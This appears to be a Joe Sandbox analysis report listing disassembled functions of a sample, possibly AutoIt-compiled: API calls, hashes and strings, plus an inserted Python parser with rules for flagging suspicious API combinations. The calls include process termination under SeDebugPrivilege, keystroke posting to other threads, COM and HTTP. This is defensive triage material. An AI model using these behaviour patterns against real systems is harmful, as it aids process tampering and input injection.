                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00BC1B10
                                              • InternetCloseHandle.WININET(00000000), ref: 00BC1B57
                                                • Part of subcall function 00BC2483: GetLastError.KERNEL32(?,?,00BC1817,00000000,00000000,00000001), ref: 00BC2498
                                                • Part of subcall function 00BC2483: SetEvent.KERNEL32(?,?,00BC1817,00000000,00000000,00000001), ref: 00BC24AD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                              • String ID:
                                              • API String ID: 2603140658-3916222277
                                              • Opcode ID: ca5818c1ad9e72adf5af5915f0183d6ead090905b5d78bb96c29904a4344a4f1
                                              • Instruction ID: c95d11a47bac214aa49b822c75fd5071b4804a138c6d219a26558d816aebb41f
                                              • Opcode Fuzzy Hash: ca5818c1ad9e72adf5af5915f0183d6ead090905b5d78bb96c29904a4344a4f1
                                              • Instruction Fuzzy Hash: 7F419FB1501209BFEB119F54CC85FFA7BACEF09350F00816AFA05AA142EB709E409BA0
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00BDF910), ref: 00BC8D28
                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00BDF910), ref: 00BC8D5C
                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00BC8ED6
                                              • SysFreeString.OLEAUT32(?), ref: 00BC8F00
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                              • String ID:
                                              • API String ID: 560350794-0
                                              • Opcode ID: d1b9f1508401bb9e2732e0bcea904cafa4431250e4c12c3820decdc92a0477a7
                                              • Instruction ID: 1b38135954478dfa89f7dbd7b82b263849e5f77edceac3c78668b0f6e9b6f111
                                              • Opcode Fuzzy Hash: d1b9f1508401bb9e2732e0bcea904cafa4431250e4c12c3820decdc92a0477a7
                                              • Instruction Fuzzy Hash: 3EF12871A00209EFDB14DF94C888EAEB7B9FF45315F10849DF916AB251DB31AE45CBA0
                                              APIs
                                              • _memset.LIBCMT ref: 00BCF6B5
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BCF848
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BCF86C
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BCF8AC
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BCF8CE
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BCFA4A
                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00BCFA7C
                                              • CloseHandle.KERNEL32(?), ref: 00BCFAAB
                                              • CloseHandle.KERNEL32(?), ref: 00BCFB22
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                              • String ID:
                                              • API String ID: 4090791747-0
                                              • Opcode ID: e08e07c4bb168cd0238ae25d58722667eef526224c7ff3e4771c02082de82208
                                              • Instruction ID: 5b6a4cd6958ede0fdf0b0847870ab2ea0c6cbd9f7b2918cd2d57d6026b3946ca
                                              • Opcode Fuzzy Hash: e08e07c4bb168cd0238ae25d58722667eef526224c7ff3e4771c02082de82208
                                              • Instruction Fuzzy Hash: C9E14D31604202DFCB14EF24C891B6ABBE1EF85354F1485EEF8999B2A1DB71DC45CB52
                                              APIs
                                                • Part of subcall function 00B51B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B52036,?,00000000,?,?,?,?,00B516CB,00000000,?), ref: 00B51B9A
                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00B520D3
                                              • KillTimer.USER32(-00000001,?,?,?,?,00B516CB,00000000,?,?,00B51AE2,?,?), ref: 00B5216E
                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00B8BCA6
                                              • DeleteObject.GDI32(00000000), ref: 00B8BD1C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                              • String ID:
                                              • API String ID: 2402799130-0
                                              • Opcode ID: 39b6ccda31976c0c26f861f6ea670dbdb7efd4f067134ee3a7b4d441a27eb0f2
                                              • Instruction ID: 3edb541e005aa92e5da77c03454b8b466efe1eb6407db80d947d56b7774dda68
                                              • Opcode Fuzzy Hash: 39b6ccda31976c0c26f861f6ea670dbdb7efd4f067134ee3a7b4d441a27eb0f2
                                              • Instruction Fuzzy Hash: 3161A131502A01DFDB35AF24D999B6AB7F1FF82312F1484E9E94257AB0C770A885DF90
                                              APIs
                                                • Part of subcall function 00BB466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BB3697,?), ref: 00BB468B
                                                • Part of subcall function 00BB466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BB3697,?), ref: 00BB46A4
                                                • Part of subcall function 00BB4A31: GetFileAttributesW.KERNEL32(?,00BB370B), ref: 00BB4A32
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00BB4D40
                                              • _wcscmp.LIBCMT ref: 00BB4D5A
                                              • MoveFileW.KERNEL32(?,?), ref: 00BB4D75
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                              • String ID:
                                              • API String ID: 793581249-0
                                              • Opcode ID: 1edf9fd5968a0c5237b56867dfe05070181edac848808b53f2913aa723191f2f
                                              • Instruction ID: 5eacda1c68ede34dcaa6b873b1120073071bd8e07c42d6fde1bad25a9b5b1fdf
                                              • Opcode Fuzzy Hash: 1edf9fd5968a0c5237b56867dfe05070181edac848808b53f2913aa723191f2f
                                              • Instruction Fuzzy Hash: 325174B20083459BC725DB64D8919EFB3ECEF84351F00496EF589D3152EF74A688C766
                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00BD86FF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: InvalidateRect
                                              • String ID:
                                              • API String ID: 634782764-0
                                              • Opcode ID: 69302bfe74497a38ae4514597ceb17100955876a721836f9110ff0df9f6c41b7
                                              • Instruction ID: 2268fe482964e829e3e0c9f6799d721db4822c5dbeb53d16097b3e8fb9a84706
                                              • Opcode Fuzzy Hash: 69302bfe74497a38ae4514597ceb17100955876a721836f9110ff0df9f6c41b7
                                              • Instruction Fuzzy Hash: DF518130501205BEEB209B28CC85FADBBE5EB06722F6041D3F915D63A1EF72E980DB41
                                              APIs
                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B8C2F7
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B8C319
                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B8C331
                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B8C34F
                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B8C370
                                              • DestroyCursor.USER32(00000000), ref: 00B8C37F
                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B8C39C
                                              • DestroyCursor.USER32(?), ref: 00B8C3AB
                                                • Part of subcall function 00BDA4AF: DeleteObject.GDI32(00000000), ref: 00BDA4E8
                                              Similarity
                                              • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                              • String ID:
                                              • API String ID: 2975913752-0
                                              • Opcode ID: 38093b45580305cbb1e887f775b2f09051f9230f9f2b705de58e8864c6948e70
                                              • Instruction ID: cc4ff804aa6763a11e5df7d8bfa93db8d13afac251427719a3d6e61d1ef52248
                                              • Opcode Fuzzy Hash: 38093b45580305cbb1e887f775b2f09051f9230f9f2b705de58e8864c6948e70
                                              • Instruction Fuzzy Hash: 98516970A01205EFDB24DF24CC85BAA7BE5FB49311F1085A9F902972E0DB70ED95DB60
                                              APIs
                                                • Part of subcall function 00BAA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BAA84C
                                                • Part of subcall function 00BAA82C: GetCurrentThreadId.KERNEL32 ref: 00BAA853
                                                • Part of subcall function 00BAA82C: AttachThreadInput.USER32(00000000,?,00BA9683,?,00000001), ref: 00BAA85A
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA968E
                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00BA96AB
                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00BA96AE
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA96B7
                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00BA96D5
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00BA96D8
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA96E1
                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00BA96F8
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00BA96FB
                                              Similarity
                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                              • String ID:
                                              • API String ID: 2014098862-0
                                              • Opcode ID: 0f3dca4c9efcd398462dfdf0f92ae47303a167d4061e4de699fe726b1604e95d
                                              • Instruction ID: fd71f6d52f6208bcee904fc237b9b63ec752c25990fb40a936cda6da0804f4d2
                                              • Opcode Fuzzy Hash: 0f3dca4c9efcd398462dfdf0f92ae47303a167d4061e4de699fe726b1604e95d
                                              • Instruction Fuzzy Hash: 5011CEB1914219BEFA106B649C89F7ABB6DEB4D750F100426F355AB0A0DEF25C10DAA4
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00BA853C,00000B00,?,?), ref: 00BA892A
                                              • RtlAllocateHeap.NTDLL(00000000,?,00BA853C), ref: 00BA8931
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00BA853C,00000B00,?,?), ref: 00BA8946
                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00BA853C,00000B00,?,?), ref: 00BA894E
                                              • DuplicateHandle.KERNEL32(00000000,?,00BA853C,00000B00,?,?), ref: 00BA8951
                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00BA853C,00000B00,?,?), ref: 00BA8961
                                              • GetCurrentProcess.KERNEL32(00BA853C,00000000,?,00BA853C,00000B00,?,?), ref: 00BA8969
                                              • DuplicateHandle.KERNEL32(00000000,?,00BA853C,00000B00,?,?), ref: 00BA896C
                                              • CreateThread.KERNEL32(00000000,00000000,00BA8992,00000000,00000000,00000000), ref: 00BA8986
                                              Similarity
                                              • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                              • String ID:
                                              • API String ID: 1422014791-0
                                              • Opcode ID: bbc97939b5e4787b1da0ab862a3f040179c28691913f54e28760f869849a6b93
                                              • Instruction ID: 9150b2fd776df510984915bac86dc0567d8fd0f3419fbd26a06be974fae8e102
                                              • Opcode Fuzzy Hash: bbc97939b5e4787b1da0ab862a3f040179c28691913f54e28760f869849a6b93
                                              • Instruction Fuzzy Hash: 8B01BBB5245309FFEB10ABA5DC4DF6B7BACEB89711F408421FA05DB1A1DA709800CB60
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: NULL Pointer assignment$Not an Object type
                                              • API String ID: 0-572801152
                                              • Opcode ID: 2fc9872176be775d68d4b441feb8247e4f32cf6c65a44cddf5559ba9bebcc7ce
                                              • Instruction ID: ac06626bac59ef6d4b5d4bff63ed29e1398026c5cd538995db3b908c8602549c
                                              • Opcode Fuzzy Hash: 2fc9872176be775d68d4b441feb8247e4f32cf6c65a44cddf5559ba9bebcc7ce
                                              • Instruction Fuzzy Hash: F9C18371A0021AABEF10DF98D888FAEB7F5FB58314F1584ADE915A7280E770DD45CB90
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: Variant$ClearInit$_memset
                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                              • API String ID: 2862541840-625585964
                                              • Opcode ID: 74e27b150f7c088c7a490cab3ee64613456daf05293e3043ce0aaa4135755383
                                              • Instruction ID: b02c120ad03f297e1af7d3279ccfe29ae0900379f005dea4c28cfb3b233f5ab6
                                              • Opcode Fuzzy Hash: 74e27b150f7c088c7a490cab3ee64613456daf05293e3043ce0aaa4135755383
                                              • Instruction Fuzzy Hash: EA915E71A00219EBEF24DFA5C888FAEB7F8EF85710F10859DF515AB280D7709945CBA4
                                              APIs
                                                • Part of subcall function 00BA710A: CLSIDFromProgID.COMBASE ref: 00BA7127
                                                • Part of subcall function 00BA710A: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00BA7142
                                                • Part of subcall function 00BA710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?,?), ref: 00BA7150
                                                • Part of subcall function 00BA710A: CoTaskMemFree.COMBASE(00000000), ref: 00BA7160
                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00BC9806
                                              • _memset.LIBCMT ref: 00BC9813
                                              • _memset.LIBCMT ref: 00BC9956
                                              • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000000), ref: 00BC9982
                                              • CoTaskMemFree.COMBASE(?), ref: 00BC998D
                                              Strings
                                              • NULL Pointer assignment, xrefs: 00BC99DB
                                              Similarity
                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                              • String ID: NULL Pointer assignment
                                              • API String ID: 1300414916-2785691316
                                              • Opcode ID: a062cfbf9b24e98e2efb0d357dabc7bc96511ab412fc473348b4146cbaa9e823
                                              • Instruction ID: e220e46b6ca720f2399616ba46ca968407f4e3c98e6427bbd3bb53a240d3846d
                                              • Opcode Fuzzy Hash: a062cfbf9b24e98e2efb0d357dabc7bc96511ab412fc473348b4146cbaa9e823
                                              • Instruction Fuzzy Hash: 93911771D00229EBDB10DFA5DC85EDEBBB9EF09350F20419AF419A7291DB719A44CFA0
                                              APIs
                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00BD6E24
                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00BD6E38
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BD6E52
                                              • _wcscat.LIBCMT ref: 00BD6EAD
                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00BD6EC4
                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00BD6EF2
                                              Strings
                                              Similarity
                                              • API ID: MessageSend$Window_wcscat
                                              • String ID: SysListView32
                                              • API String ID: 307300125-78025650
                                              • Opcode ID: cb4bbc19a8e63b6e992eae49b9111cdc8440aa379bd2c5f9a200c4fc2d2b7b5c
                                              • Instruction ID: 54435105c8d705264a2a95915483222ea2d25cffa07e8da99b247ccd58f8900e
                                              • Opcode Fuzzy Hash: cb4bbc19a8e63b6e992eae49b9111cdc8440aa379bd2c5f9a200c4fc2d2b7b5c
                                              • Instruction Fuzzy Hash: 61419171A00349ABEB21DF64CC85BEEB7E9EF08350F1044AAF585E72D1E6719D84CB60
                                              APIs
                                                • Part of subcall function 00BB3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00BB3C7A
                                                • Part of subcall function 00BB3C55: Process32FirstW.KERNEL32(00000000,?), ref: 00BB3C88
                                                • Part of subcall function 00BB3C55: CloseHandle.KERNEL32(00000000), ref: 00BB3D52
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BCE9A4
                                              • GetLastError.KERNEL32 ref: 00BCE9B7
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BCE9E6
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BCEA63
                                              • GetLastError.KERNEL32(00000000), ref: 00BCEA6E
                                              • CloseHandle.KERNEL32(00000000), ref: 00BCEAA3
                                              Strings
                                              Similarity
                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 2533919879-2896544425
                                              • Opcode ID: ad5fd41ceb5a81f72ffd472ad1f3be7f760b4862ed6feed055bc34268219fc21
                                              • Instruction ID: 2c52e6d997bf8662f19e17aa5353e2a21a35734eef7b36b86a60e74455294348
                                              • Opcode Fuzzy Hash: ad5fd41ceb5a81f72ffd472ad1f3be7f760b4862ed6feed055bc34268219fc21
                                              • Instruction Fuzzy Hash: B44176716042019FDB14EF24C8A5F6ABBE5AF41310F0884A9F9169B2D2DBB5E908CF95
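Every entry in this listing has the same shape: an APIs list whose lines carry a `ref:` address and, for calls one level down, a `Part of subcall function` prefix; an optional Strings list with `xrefs:`; and a Similarity block that always ends with the Instruction Fuzzy Hash. The following is an added example, not code from Joe Sandbox or from the analysed sample: a parser that turns that text into per-function records and flags API pairings worth a second look, such as the SeDebugPrivilege + OpenProcess/TerminateProcess combination and the CoInitializeSecurity + CoCreateInstanceEx sequence above. The SAMPLE text is a constructed excerpt copied from three entries on this page; FLAG_RULES and the `decode_clsctx` helper are this example's own additions (the CLSCTX bit names are the documented combase.h values).

```python
"""Parse Joe Sandbox IDA-plugin function entries and flag API combinations.

Added example, not part of the Joe Sandbox report.  SAMPLE is a constructed excerpt in the
report's own layout; FLAG_RULES and CLSCTX are this example's additions (combase.h bit names).
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE = """\
APIs
  • Part of subcall function 00BB3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00BB3C7A
  • Part of subcall function 00BB3C55: Process32FirstW.KERNEL32(00000000,?), ref: 00BB3C88
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BCE9A4
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00BCEA63
Similarity
• String ID: SeDebugPrivilege
• Instruction Fuzzy Hash: B44176716042019FDB14EF24C8A5F6ABBE5AF41310F0884A9F9169B2D2DBB5E908CF95
APIs
  • Part of subcall function 00BAA82C: AttachThreadInput.USER32(00000000,?,00BA9683,?,00000001), ref: 00BAA85A
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA968E
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00BA96AB
Similarity
• String ID:
• Instruction Fuzzy Hash: 5011CEB1914219BEFA106B649C89F7ABB6DEB4D750F100426F355AB0A0DEF25C10DAA4
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00BC9806
• CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000000), ref: 00BC9982
Strings
• NULL Pointer assignment, xrefs: 00BC99DB
Similarity
• String ID: NULL Pointer assignment
• Instruction Fuzzy Hash: 93911771D00229EBDB10DFA5DC85EDEBBB9EF09350F20419AF419A7291DB719A44CFA0
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "Part of subcall function X: Api.MODULE(args), ref: ADDR"; the argument list is optional.
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
                    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
XREF_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<refs>[0-9A-F, ]+)$")
KV_RE = re.compile(r"^(?P<key>[A-Za-z][\w ]*): ?(?P<val>.*)$")
CLSCTX = {0x1: "INPROC_SERVER", 0x2: "INPROC_HANDLER", 0x4: "LOCAL_SERVER", 0x10: "REMOTE_SERVER"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int
    via_subcall: Optional[str]  # callee address when the call sits one level down


@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)
    strings: dict = field(default_factory=dict)  # string -> xref addresses
    meta: dict = field(default_factory=dict)     # Similarity / dump-source key/value fields

    def api_names(self, include_subcalls=True):
        return {c.api for c in self.calls if include_subcalls or c.via_subcall is None}


def parse_entries(text):
    """Split report text into FunctionEntry records; an entry ends at its Instruction Fuzzy Hash."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line in SECTION_HEADERS:
            section, cur = line, cur or FunctionEntry()
        elif not line or cur is None:
            continue
        elif m := API_RE.match(line):
            args = tuple(m["args"].split(",")) if m["args"] else ()
            cur.calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"]))
        elif section == "Strings" and (m := XREF_RE.match(line)):
            cur.strings[m["text"]] = [int(r, 16) for r in re.findall(r"[0-9A-F]+", m["refs"])]
        elif m := KV_RE.match(line):
            cur.meta[m["key"]] = m["val"]
            if m["key"] == "Instruction Fuzzy Hash":  # last field of every entry
                entries.append(cur)
                cur = None
    return entries


FLAG_RULES = (  # (required APIs, required string or None, description): this example's assumptions
    ({"OpenProcess", "TerminateProcess"}, "SeDebugPrivilege",
     "opens and terminates other processes after enabling SeDebugPrivilege"),
    ({"CreateToolhelp32Snapshot", "Process32FirstW"}, None, "enumerates running processes via Toolhelp32"),
    ({"AttachThreadInput", "PostMessageW"}, None, "attaches to another thread's input queue and posts key messages"),
    ({"CoInitializeSecurity", "CoCreateInstanceEx"}, None, "creates COM objects with an explicit security level and server context"),
)


def flag_entry(entry):
    """Descriptions of every FLAG_RULE the entry satisfies (all APIs present, string seen if required)."""
    seen = list(entry.strings) + [entry.meta.get("String ID", "")]
    return [why for apis, needle, why in FLAG_RULES
            if apis <= entry.api_names() and (needle is None or any(needle in s for s in seen))]


def decode_clsctx(hex_arg):
    """Name the CLSCTX bits in a CoCreateInstanceEx dwClsCtx argument such as 00000015."""
    return [name for bit, name in sorted(CLSCTX.items()) if int(hex_arg, 16) & bit]
```

Run over the three excerpted entries, the parser yields three records: the first satisfies both the SeDebugPrivilege/TerminateProcess rule and the Toolhelp32 enumeration rule, the second the AttachThreadInput/PostMessageW rule, and the third the COM rule; `decode_clsctx("00000015")` on the third entry's CoCreateInstanceEx argument returns INPROC_SERVER, LOCAL_SERVER and REMOTE_SERVER, i.e. the call accepts an out-of-process or remote server, which is worth knowing when reading the COM-related signatures at the top of this report. Paste further entries from the page into SAMPLE (or read the report text from a file) to extend the run; the rules are a starting point, not a detection list the report itself provides.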
                                              APIs
                                              • LoadIconW.USER32(00000000,00007F03), ref: 00BB3033
                                              Strings
                                              Similarity
                                              • API ID: IconLoad
                                              • String ID: blank$info$question$stop$warning
                                              • API String ID: 2457776203-404129466
                                              • Opcode ID: eb63b832bf55f156e2493d9bad6061e106f14535279d4e1329078d0dc91556ee
                                              • Instruction ID: 279671bcd3049b663961749dc22a7862fc5ed97b8ff513e96bda0c3e07e1bf67
                                              • Opcode Fuzzy Hash: eb63b832bf55f156e2493d9bad6061e106f14535279d4e1329078d0dc91556ee
                                              • Instruction Fuzzy Hash: 9711053124C386BFE714AB14DC82EFB67DCDF19760B6080AAF904A61C1EAE06F4456A4
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00BB4312
                                              • LoadStringW.USER32(00000000), ref: 00BB4319
